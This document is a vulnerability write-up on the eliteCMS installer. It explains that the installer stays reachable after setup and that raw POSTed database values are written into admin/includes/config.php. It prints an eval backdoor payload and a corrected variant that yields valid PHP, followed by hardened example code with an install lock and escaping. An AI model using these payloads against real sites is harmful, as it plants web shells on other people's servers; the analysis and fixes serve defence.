eliteCMS's installer is not locked after installation completes, so an attacker can revisit the installer URL and run the installation again.
A second vulnerability is that the installer can be made to write a one-line (eval) backdoor straight into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ...(omitted)...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // Session values are interpolated raw into double-quoted PHP string literals
    // of the file that will be written and later executed.
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "    die(\"Database connection failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "    die(\"Database select failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "?>\n";

    // No lock check, no validation: whatever is in $_SESSION lands in config.php.
    $writer = fopen($file, 'w');
...
Now look at where those session values come from:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are taken from $_POST without any validation.
If the database name field is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.

One check worth making before relying on that exact string: the generated line becomes define("DB_NAME", ""?><?php eval($_POST[c]);?><?php");, which leaves the define() call unclosed before the ?> and is a PHP parse error, so config.php (and every admin page that includes it) dies instead of executing the backdoor. A payload that also closes the string and the call, such as ");?><?php eval($_POST[c]);?><?php //, yields valid PHP: the // comments out the rest of the installer's own line and the following define() lines are untouched. The root cause is the same either way: unvalidated POST data is interpolated into a double-quoted PHP string literal inside a file that is later executed. Note also that with magic_quotes_gpc enabled (common on 2008-era PHP hosting) the quote characters in the POST body arrive escaped as \" and the injection fails; the write-up assumes it is off.
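The following is an added example, not code from eliteCMS or from the original post. It shows the two fixes the write-up implies: an install lock checked before any installer step runs, and a config.php generator that validates the database identifiers and emits every value with var_export() so a POSTed value can never break out of its string literal. The function names and the install.lock marker file are assumptions for the illustration; the attacker inputs are constructed from the payload discussed above.

```php
<?php
// Added example, not eliteCMS code. Demonstrates an install lock checked before
// every installer step, and a config.php generator that cannot be broken out of
// by the POSTed DB values. Assumed (hypothetical) names: install.lock as the
// marker file and all function names below; eliteCMS has none of them.
declare(strict_types=1);

// Constructed attacker input: the one-liner from the write-up and a variant
// that keeps the generated define() syntactically valid.
const ATTACKER_INPUTS = [
    '"?><?php eval($_POST[c]);?><?php',
    '");?><?php eval($_POST[c]);?><?php //',
];

/** Same interpolation as the original installer: raw values inside "...". */
function buildConfigVulnerable(array $s): string
{
    $w  = "<?php\n";
    $w .= "define(\"DB_SERVER\", \"{$s['DB_SERVER']}\");\n";
    $w .= "define(\"DB_NAME\", \"{$s['DB_NAME']}\");\n";
    $w .= "define(\"DB_USER\", \"{$s['DB_USER']}\");\n";
    $w .= "define(\"DB_PASS\", \"{$s['DB_PASS']}\");\n";
    return $w;
}

/** Whitelist host, database and user names; anything else is rejected. */
function validateIdentifier(string $field, string $value): string
{
    if (!preg_match('/\A[A-Za-z0-9_.\-]{1,64}\z/', $value)) {
        throw new InvalidArgumentException("invalid value for $field");
    }
    return $value;
}

/** Hardened generator: validated identifiers, var_export() for every literal. */
function buildConfigSafe(array $s): string
{
    $values = [
        'DB_SERVER' => validateIdentifier('DB_SERVER', $s['DB_SERVER']),
        'DB_NAME'   => validateIdentifier('DB_NAME', $s['DB_NAME']),
        'DB_USER'   => validateIdentifier('DB_USER', $s['DB_USER']),
        // A password may legitimately contain quotes or $; var_export() emits a
        // single-quoted literal with ' and \ escaped, so it can never become code.
        'DB_PASS'   => $s['DB_PASS'],
    ];
    $w = "<?php\n";
    foreach ($values as $name => $value) {
        $w .= 'define(' . var_export($name, true) . ', ' . var_export($value, true) . ");\n";
    }
    return $w;
}

function installLocked(string $lockFile): bool
{
    return is_file($lockFile);
}

/** Wrap every installer step (not only step 4): refuse to run once the lock exists. */
function runInstallerStep(string $lockFile, callable $step): void
{
    if (installLocked($lockFile)) {
        http_response_code(403);
        exit("Installer is locked. Remove " . basename($lockFile) . " to reinstall.\n");
    }
    $step();
}

/** Final step: write config.php atomically, then drop the lock. */
function writeConfigAndLock(string $configFile, string $lockFile, array $s): void
{
    $config = buildConfigSafe($s);
    // Write to a temp file and rename so a half-written config is never served.
    $tmp = $configFile . '.tmp';
    if (file_put_contents($tmp, $config, LOCK_EX) === false || !rename($tmp, $configFile)) {
        throw new RuntimeException("could not write $configFile");
    }
    file_put_contents($lockFile, "installed " . date('c') . "\n", LOCK_EX);
}

// Demo: feed both payloads through the vulnerable and the hardened generator.
foreach (ATTACKER_INPUTS as $payload) {
    $session = [
        'DB_SERVER' => 'localhost',
        'DB_NAME'   => $payload,
        'DB_USER'   => 'elitecms',
        'DB_PASS'   => 'p@ss"w0rd$',
    ];
    echo "--- vulnerable generator produced ---\n" . buildConfigVulnerable($session);
    try {
        buildConfigSafe($session);
    } catch (InvalidArgumentException $e) {
        echo "--- hardened generator: " . $e->getMessage() . " ---\n\n";
    }
}

// For sane input the hardened output is plain literals, quotes in the password included.
echo buildConfigSafe(['DB_SERVER' => 'localhost', 'DB_NAME' => 'elitecms',
                      'DB_USER' => 'elitecms', 'DB_PASS' => 'p@ss"w0rd$']);
```

Two practical notes: the lock check belongs at the top of install.php, before $_GET['step'] is even read, since the session values are collected in the earlier steps; and after the installer writes the file, php -l admin/includes/config.php is a cheap way to confirm the generated file still parses, which is exactly the check the original installer never makes.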